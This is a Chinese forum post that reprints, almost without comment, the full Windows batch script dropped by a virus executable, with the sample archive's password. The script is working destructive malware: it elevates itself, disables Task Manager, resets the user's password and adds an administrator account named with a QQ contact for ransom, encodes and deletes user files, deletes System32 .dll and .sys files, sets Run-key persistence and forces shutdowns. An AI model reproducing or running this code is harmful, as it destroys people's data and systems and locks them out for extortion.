这是病毒exe生成的bat,解压密码threatbook
看了下,代码为:
- [url=home.php?mod=space&uid=500624]@Shift[/url] /0
- [url=home.php?mod=space&uid=331734]@echo[/url] off
- cd C:\Users\%username%\Desktop\
- if not exist warn1.vbs (goto vbs1)
- if exist warn1.vbs (goto vbs2)
- : vbs1
- echo msgbox "这是个病毒,如果是不小心点的,别再点了" >>warn1.vbs
- start warn1.vbs
- exit
- : vbs2
- echo msgbox "这是个病毒,说过了吧" >warn2.vbs
- echo msgbox "如果这真的是测试环境,欢迎您再次双击进行测试" >>warn2.vbs
- goto startahead
- :wwaarrnn
- start warn2.vbs
- exit
- : startahead
- if not exist C:\Windows\tat.txt (goto create)
- if exist C:\Windows\tat.txt (goto hack)
- : create
- echo msgbox "这是最后一次警告!!!" >>警告.vbs
- start 警告.vbs
- echo come on!!! >>C:\Windows\tat.txt
- goto wwaarrnn
- exit
- :hack
- %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
- echo 这是个病毒,作者说过了吧
- choice /t 2 /d y /n >nul
- cls
- echo @echo off>>lock.bat
- echo net user %username% 5539661qpec >>lock.bat
- ehco net user guest /active :yes>>lock.bat
- echo net user 要密码加QQ3051200685 administrator /add>>lock.bat
- echo net localgroup administrators 要密码加QQ3051200685 /add >>lock.bat
- echo exit >>lock.bat
- start lock.bat
- cls
- echo 今天
- echo 是
- echo 多么美好的一天
- echo 所以
- echo 接受审判吧,你这狂妄之人
- choice /t 2 /d y /n >nul
- cls
- color a
- %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit
- md %temp%\tmprun
- cd %SystemDrive%\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %UserProFile%\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Desktop\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Downloads\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Favorites\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Searches\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Saved Games\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Contacts\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Links\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Videos\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Pictures\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Documents\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Music\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %SystemDrive%\
- del /s /q *.光墓data
- taskkill /f /im explorer.exe
- cd C:\Users\%username%\Desktop\
- for /l %%i in (1, 1, 100) do md b%%i
- for /l %%i in (1, 1, 100) do copy %0 b%%i
- for /l %%i in (1, 1, 100) do for /l %%q in (1,1,100) do echo 1 >b%%i\第%%q个无法删除的文件.txt
- for /l %%i in (1, 1, 100) do echo do >>b%%i\提示%%i.vbs
- for /l %%i in (1, 1, 100) do echo msgbox "这是你的第%%i个文件夹",16,"病毒提示" >>b%%i\提示%%i.vbs
- for /l %%i in (1, 1, 100) do echo loop >>b%%i\提示%%i.vbs
- for /l %%i in (1, 1, 100) do move *.光墓是你爸 b%%i\
- for /l %%i in (1, 1, 100) do if exist "b%%i\提示%%i.vbs" (
- start b%%i\提示%%i.vbs )
- for /l %%i in (1, 1, 100) do attrib +s +h "C:\Users\Administrator\Desktop\b%%i"
- taskkill /f /im wscript.exe
- md 加密
- for /l %%i in (1, 1, 100) do echo msgbox "我们隐藏了第%%i个文件夹" >>加密\加密%%i.vbs
- for /l %%i in (1, 1, 100) do start 加密\加密%%i.vbs
- attrib +s +h "C:\Users\Administrator\Desktop\加密"
- taskkill /f /im wscript.exe
- copy %0 C:\Windows\System32\lock.bat
- echo del *.* /s /q tree>>de.bat
- start de.bat
- echo taskkill /f /im explorer.exe >>bili.bat
- echo taskkill /f /im wininit.exe >>bili.bat
- echo shutdown
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winstat /t reg_sz /d C:\Users\%username%\Desktop\bili.bat
- attrib +s +h C:\Users\%username%\Desktop\bili.bat
- del lock.bat
- echo del C:\Windows\System32\*.dll>>e.bat
- echo del e.bat >>e.bat
- start e.bat
- echo del C:\Windows\System32\*.sys>>f.bat
- echo del f.bat >>f.bat
- start f.bat
- echo nuiehewio>>11.vbs
- echo oueif89y32983>>11.vbs
- echo do>>equ.vbs
- echo msgbox ("DE DEUHOU")>>equ.vbs
- echo loop >>equ.vbs
- echo :a >>sta.bat
- echo start equ.vbs >>sta.bat
- echo goto a >>sta.bat
- start sta.bat
- echo shutdown /s /t 2 /c "You are FUCKED!!!">>down.bat
- start notepad.exe
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winrar /t reg_sz /d C:\Users\%username%\Desktop\down.bat
- start notepad.exe
- TASKKILL /F /IM WSCRIPT.EXE
- shutdown /s /t 5 /c "Bye~Bye"
复制代码
|